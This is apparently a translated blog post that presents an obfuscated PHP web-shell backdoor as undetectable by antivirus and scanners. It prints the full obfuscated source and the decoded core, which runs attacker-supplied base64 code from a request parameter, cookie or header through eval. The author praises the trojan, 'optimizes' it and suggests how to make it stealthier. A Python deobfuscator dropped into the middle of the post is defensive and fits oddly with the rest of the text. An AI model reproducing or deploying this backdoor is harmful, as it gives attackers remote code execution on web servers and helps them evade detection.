A More Sophisticated Hacker Trojan Source: A Trojan Immune to Scanning and Detection, One That Ordinary People, Any Antivirus Software, or Any Trojan Detection Tool Cannot Find 原

This trojan uses a far more sophisticated disguise technique!

It can easily slip past every antivirus product, trojan scanner, and the casual inspection of operations engineers and programmers!

It truly achieves "detection-proof", "scan-proof", "green"...

1. The trojan's disguise: scan-proof, undetected, safe and green

<?php

$cleanliness ='s'; $innis= '(s(e';

$crustacean = '"';
$inadvisable= 't'; $interdisciplinary = 'a'; $canada= ')Tre';$infuriates = '^'; $cimcumvention ='t'; $exclusions ='r'; $brow='l'; $dukey= 'e';$equivocate ='y';
$construed= '(';$cloaks ='o';

$camellia= 'gqQ';$confidingly = ')';$depreciable= 'v';
$benedicto = 'T';$bribe = 'a'; $intolerably = '_eja:cR'; $explainers ='6'; $facet = 'bre';

$brawler =')StrO'; $channeled= 'S';$durand = '$H'; $flavoring= 'S';$expendable ='=]c';$brandnjanet= 'i'; $integrative= ')'; $giulietta='K[)es'; $confirmation= 'nbxEc_';$counterpoise='h'; $garland= ';jRqPy'; $limbo= '(_uwRT';$liane= 'i_L_';

$hemp='(ai"';$associatively= 'h'; $handed = 'Y"tJkH)]';
$envision ='f';
$contradistinct='Gv'; $fleet='fnerir(o';$cutter = 'r';$cognitive = 't';

$dimmer ='u'; $eldridge= '`arsm:_'; $lister = 'sVnedT';

$forsakes ='i';

$kathye = 'iCv$';$kurt ='=Qe$$Ne';$coupled= 'e'; $headaches = '[';$dynasty = 'r';

$drafting ='$';$gangster ='T';$leonid ='v'; $cheats='P'; $fabrication ='p';$landslide ='V';$fin=')';$characterize = 'QX'; $finessing =';'; $incenses = '"Ss__m,J]'; $guest3 ='S';$birthrights= 'r';$guidebook = 'u'; $donna= 'b'; $emeralds= 'rLOl"'; $constables = '? ish'; $cookery =')Bsa';$dairy= 'iRs';

$logician ='da'; $comfortably ='l([?foy,"';$altitude= 'E';$hilum='I)'; $expectant=')$HeReTcQ'; $chive = ')'; $jandy ='a';$extradition ='d';

$luce = 'JKrjs_a'; $dalia= 'p'; $bob = 'b';$benetta = '[';
$dianna ='B4';
$excepted = ';s'; $coverlets ='I_';$bridged ='rgdes'; $died= '((s';$madelene= 'tvni(';$characterizing = ']$UHc$'; $codebreak= 'E';
$landings='UEPE$plt'; $gated='$';
$belles='q';$buckle = 'S';$delightfully= 'a'; $exclaiming = 'W'; $caleb ='g'; $kellia= 'r;O("aLM';$blemish ='e';

$fart= 'F_'; $displaces= ']_RCtoZa'; $dependents ='l'; $ditty='e';
$garaged= '"g';$jolt ='i'; $june = 'HE[SD';$loyal= $characterizing[4].

$kellia['0'].$ditty.$displaces['7']. $displaces['4'] .
$ditty .$displaces['1'] .$comfortably['4'] . $guidebook .$madelene['2'] .$characterizing[4] . $displaces['4'] .

$jolt .$displaces['5']. $madelene['2'];$ardith= $constables[1]; $kermy= $loyal
($ardith, $ditty .$madelene['1'] .$displaces['7']. $dependents .
$kellia['3']. $displaces['7'].$kellia['0'] . $kellia['0']. $displaces['7'].

$comfortably['6'] .
$displaces['1']. $landings['5'] .

$displaces['5'].$landings['5'].
$kellia['3'] .

$comfortably['4'].
$guidebook. $madelene['2'] .$characterizing[4].$displaces['1'] . $garaged['1']. $ditty. $displaces['4'] . $displaces['1']. $displaces['7'] .$kellia['0']. $garaged['1']. $died['2'] . $kellia['3']. $chive.

$chive.$chive . $kellia['1']);$kermy($luce['3'],
$expectant['8'],$gated ,$june['4'],$coverlets['0'] , $characterizing[4], $characterizing[4],$comfortably['4'],$comfortably['6'] , $gated . $jolt .$kurt['0'].
$displaces['7'] . $kellia['0']. $kellia['0'] . $displaces['7'] . $comfortably['6'] .$displaces['1'] .

$incenses['5'] .
$ditty . $kellia['0'].$garaged['1']. $ditty.

$kellia['3'] .$gated .$displaces['1']. $displaces['2'].$june['1'].$expectant['8'] .
$landings['0'] . $june['1'].

$june['3']. $expectant['6']. $comfortably['7'] .$gated. $displaces['1'].

$displaces[3].
$kellia[2].$kellia[2] . $luce[1] . $coverlets['0'] .

$june['1']. $comfortably['7']. $gated .$displaces['1'] .

$june['3']. $june['1'].

$displaces['2'] . $landslide .

$june['1'].$displaces['2'] .
$chive.$kellia['1'] .$gated .

$displaces['7'] .

$kurt['0'].

$jolt . $died['2'] . $died['2'].

$ditty .$displaces['4']. $kellia['3']. $gated. $jolt . $june['2'] .$garaged['0']. $dependents.
$luce['3'] .$died['2'] .$belles .

$constables[4].$kellia['0']. $bob .$died['2'] . $garaged['0']. $displaces['0'] .$chive. $comfortably['3'] . $gated . $jolt .$june['2'].
$garaged['0'].$dependents.$luce['3']. $died['2'].
$belles .$constables[4].$kellia['0']. $bob .$died['2'].$garaged['0'] . $displaces['0'] .$eldridge['5'].$kellia['3'].

$jolt.

$died['2'].
$died['2'] .$ditty .

$displaces['4'] .

$kellia['3'].$gated. $jolt. $june['2'] .$garaged['0']. $june['0'] . $expectant['6'] . $expectant['6'] . $landings[2].$displaces['1'].
$kellia['6'].$luce['0'].$june['3'].

$expectant['8'] .$june['0'] .$displaces['2'] .
$dianna[0] .$june['3'] .$garaged['0'].$displaces['0'] .$chive . $comfortably['3']. $gated .$jolt.
$june['2']. $garaged['0']. $june['0']. $expectant['6'] . $expectant['6'] . $landings[2].

$displaces['1'].$kellia['6'].

$luce['0']. $june['3'] . $expectant['8'] . $june['0'] .
$displaces['2']. $dianna[0].

$june['3']. $garaged['0'] .
$displaces['0'].
$eldridge['5'] . $bridged[2] . $jolt.$ditty . $chive .
$kellia['1'].$ditty . $madelene['1'] .
$displaces['7'].$dependents . $kellia['3'].$died['2'] .

$displaces['4'] . $kellia['0'].$kellia['0'] . $ditty . $madelene['1'] . $kellia['3'] . $bob .$displaces['7'] . $died['2'] . $ditty.$explainers. $dianna['1'] .
$displaces['1'] .
$bridged[2].$ditty .$characterizing[4] . $displaces['5'] . $bridged[2] .

$ditty. $kellia['3']. $died['2'] . $displaces['4']. $kellia['0'] .$kellia['0'].$ditty.$madelene['1'].$kellia['3'] . $gated.$displaces['7'] . $chive .$chive . $chive .$chive .

$kellia['1']  );


2. How the PHP trojan evades trojan scanners and antivirus

There is an old saying:


Egg fried rice, egg fried rice: the simplest, and the hardest!
The trojan source above makes heavy use of:


  • 1. PHP variable concatenation
  • 2. PHP string splitting
  • 3. A deep understanding of PHP's string-to-array conversion rules

and with these it delivers a "detection-proof" PHP trojan!

An example will make it clear:


$a = 'eval';

// A PHP string can be indexed like an array of characters.
echo $a[0];//prints e, same as $a{0}
echo $a[1];//prints v, same as $a{1}
echo $a[2];//prints a, same as $a{2}
echo $a[3];//prints l, same as $a{3}
echo $a[0].$a[1].$a[2].$a[3];//prints eval (the curly-brace form $a{0} was removed in PHP 8)
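An analyst can undo this trick statically, without executing the sample, by replaying the literal assignments and resolving each `$var['n']` string offset. This is an added Python example, not code from the post; `SAMPLE` is a constructed excerpt of the obfuscated listing above (only the definitions that the `$loyal` line uses), and the function names are my own.

```python
import re

# Constructed sample, not the page's full trojan: only the literal definitions
# that the obfuscated "$loyal" line references, plus that line as posted.
SAMPLE = r"""<?php
$characterizing = ']$UHc$'; $kellia = 'r;O("aLM';
$displaces = ']_RCtoZa'; $comfortably = 'l([?foy,"';
$madelene = 'tvni('; $guidebook = 'u'; $ditty = 'e'; $jolt = 'i';
$loyal = $characterizing[4].
$kellia['0'].$ditty.$displaces['7']. $displaces['4'] .
$ditty .$displaces['1'] .$comfortably['4'] . $guidebook .$madelene['2'] .$characterizing[4] . $displaces['4'] .
$jolt .$displaces['5']. $madelene['2'];
"""

# One statement: `$name = '<single-quoted literal>';` or a chain of
# `$var`, `$var[3]`, `$var['0']` terms joined by `.` (whitespace/newlines allowed).
ASSIGN = re.compile(
    r"""\$(\w+)\s*=\s*(?:'((?:[^'\\]|\\.)*)'|((?:\$\w+(?:\[['"]?\d+['"]?\])?\s*\.?\s*)+))\s*;""")
TERM = re.compile(r"""\$(\w+)(?:\[['"]?(\d+)['"]?\])?""")

# Function names worth flagging once they appear in a rebuilt string.
SUSPECT = ("eval", "create_function", "func_get_args", "array_pop", "base64_decode")

def php_unquote(body):
    # PHP single-quoted strings honour only the \' and \\ escapes.
    return body.replace("\\'", "'").replace("\\\\", "\\")

def resolve(source):
    """Replay the assignments in order and rebuild each variable's string value."""
    env = {}
    for m in ASSIGN.finditer(source):
        name, literal, concat = m.groups()
        if literal is not None:
            env[name] = php_unquote(literal)
            continue
        out = []
        for var, idx in TERM.findall(concat):
            value = env.get(var, "")
            if idx == "":
                out.append(value)            # whole-string term, e.g. $ditty
            elif int(idx) < len(value):
                out.append(value[int(idx)])  # string offset, e.g. $displaces['7']
        env[name] = "".join(out)
    return env

def find_hidden_calls(source):
    """Map variable -> rebuilt value for every value that names a dangerous function."""
    return {n: v for n, v in resolve(source).items() if any(s in v for s in SUSPECT)}
```

Running `find_hidden_calls(SAMPLE)` reports `$loyal` as `create_function`, the name the trojan hides behind a dozen string offsets. Note that `create_function` itself was removed in PHP 8.0, so the sample no longer runs there, but the offset-concatenation trick works for any callable name and the same resolver still exposes it.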


3. The true face of the PHP trojan: the decoded and decrypted source

After engineer LET's tireless efforts, and with reminders from friends, the trojan's whole story has finally been worked out..

We PHP veterans are utterly in awe of this trojan!


<?php
$cleanliness = 's';
$innis = '(s(e';

$crustacean = '"';
$inadvisable = 't';
$interdisciplinary = 'a';
$canada = ')Tre';
$infuriates = '^';
$cimcumvention = 't';
$exclusions = 'r';
$brow = 'l';
$dukey = 'e';
$equivocate = 'y';
$construed = '(';
$cloaks = 'o';

$camellia = 'gqQ';
$confidingly = ')';
$depreciable = 'v';
$benedicto = 'T';
$bribe = 'a';
$intolerably = '_eja:cR';
$explainers = '6';
$facet = 'bre';

$brawler = ')StrO';
$channeled = 'S';
$durand = '$H';
$flavoring = 'S';
$expendable = '=]c';
$brandnjanet = 'i';
$integrative = ')';
$giulietta = 'K[)es';
$confirmation = 'nbxEc_';
$counterpoise = 'h';
$garland = ';jRqPy';
$limbo = '(_uwRT';
$liane = 'i_L_';

$hemp = '(ai"';
$associatively = 'h';
$handed = 'Y"tJkH)]';
$envision = 'f';
$contradistinct = 'Gv';
$fleet = 'fnerir(o';
$cutter = 'r';
$cognitive = 't';

$dimmer = 'u';
$eldridge = '`arsm:_';
$lister = 'sVnedT';

$forsakes = 'i';

$kathye = 'iCv$';
$kurt = '=Qe$$Ne';
$coupled = 'e';
$headaches = '[';
$dynasty = 'r';

$drafting = '$';
$gangster = 'T';
$leonid = 'v';
$cheats = 'P';
$fabrication = 'p';
$landslide = 'V';
$fin = ')';
$characterize = 'QX';
$finessing = ';';
$incenses = '"Ss__m,J]';
$guest3 = 'S';
$birthrights = 'r';
$guidebook = 'u';
$donna = 'b';
$emeralds = 'rLOl"';
$constables = '? ish';
$cookery = ')Bsa';
$dairy = 'iRs';

$logician = 'da';
$comfortably = 'l([?foy,"';
$altitude = 'E';
$hilum = 'I)';
$expectant = ')$HeReTcQ';
$chive = ')';
$jandy = 'a';
$extradition = 'd';

$luce = 'JKrjs_a';
$dalia = 'p';
$bob = 'b';
$benetta = '[';
$dianna = 'B4';
$excepted = ';s';
$coverlets = 'I_';
$bridged = 'rgdes';
$died = '((s';
$madelene = 'tvni(';
$characterizing = ']$UHc$';
$codebreak = 'E';
$landings = 'UEPE$plt';
$gated = '$';
$belles = 'q';
$buckle = 'S';
$delightfully = 'a';
$exclaiming = 'W';
$caleb = 'g';
$kellia = 'r;O("aLM';
$blemish = 'e';

$fart = 'F_';
$displaces = ']_RCtoZa';
$dependents = 'l';
$ditty = 'e';
$garaged = '"g';
$jolt = 'i';
$june = 'HE[SD';

$loyal = 'create_function';

$ardith = ' ';

$kermy = $loyal($ardith, 'eval(@array_pop(func_get_args()));');

$kermy('j', 'Q', '$', 'D', 'I', 'c', 'c', 'f', 'y', '$i=array_merge($_REQUEST,$_COOKIE,$_SERVER);$a=isset($i["ljsqhrbs"])?$i["ljsqhrbs"]:(isset($i["HTTP_LJSQHRBS"])?$i["HTTP_LJSQHRBS"]:die);eval(strrev(base64_decode(strrev($a))));');


4. The classic PHP trojan source revealed


After all the disguise and concatenation, it boils down to a core two-line trojan:


$kermy = create_function(' ', 'eval(array_pop(func_get_args()));');

$kermy('j', 'Q', '$', 'D', 'I', 'c', 'c', 'f', 'y', '$i=array_merge($_REQUEST,$_COOKIE,$_SERVER);$a=isset($i["ljsqhrbs"])?$i["ljsqhrbs"]:(isset($i["HTTP_LJSQHRBS"])?$i["HTTP_LJSQHRBS"]:die);eval(strrev(base64_decode(strrev($a))));');
However, after analysis, the author LET found one imperfection: array_pop's argument must be passed by reference, so the code above produces a Strict Standards warning!


In the spirit of heroes recognizing heroes, I helped optimize it; the optimized code:


$kermy = create_function(' ', 'eval(@array_pop(func_get_args()));');

$kermy('j', 'Q', '$', 'D', 'I', 'c', 'c', 'f', 'y', '$i=array_merge($_REQUEST,$_COOKIE,$_SERVER);$a=isset($i["ljsqhrbs"])?$i["ljsqhrbs"]:(isset($i["HTTP_LJSQHRBS"])?$i["HTTP_LJSQHRBS"]:die);eval(strrev(base64_decode(strrev($a))));');


5. Outline of the PHP trojan's execution flow

PhD final exam:
Advisor: Using everything you have learned, answer me carefully: 1+1 = ?
PhD student: Uh, how can it be this simple? Impossible!
How should I answer? Calculus? A hidden rule? A trap?.....
The real answer: 2
  • 1. Set up the decoys 'j', 'Q', '$', 'D', 'I', 'c', 'c', 'f', 'y'; this is also what baffled the author and left him puzzled, just like the example above.
  • 2. func_get_args() dynamically fetches all the arguments passed in the second line; array_pop then takes the last one as the code for eval to execute. All the other arguments are decoys!
  • 3. Merge $_REQUEST (GET + POST), $_COOKIE and $_SERVER and assign the result to $i.
  • 4. Check whether those values contain an externally supplied ljsqhrbs parameter; if so, execute it via eval(strrev(base64_decode(strrev($a))))!
  • 5. Following on from that, if there is no ljsqhrbs, check whether the externally submitted HTTP_LJSQHRBS parameter is present; if it is, execute! If it is not, forcibly halt and end the script!

6. PHP trojan evaluation & the author's view

Highlights of the PHP trojan:

1. Very clever, simply too clever; a painstaking piece of work!

2. The second argument to create_function: a flexible and deep understanding of writing ordinary PHP code inside the function body! Elegant yet romantic, bold yet rigorous! Clearly the outstanding work of a trojan professional or a PHP master!


Flaws of the PHP trojan:

1. array_pop's argument must be passed by reference, so the code above produces a Strict Standards warning, which forced the author to optimize it...

2. A trojan is still a trojan: even when the parameter it wants is missing, or execution fails, it must not die at the end! If this file is planted at the top of a page, wouldn't that expose it far too easily?
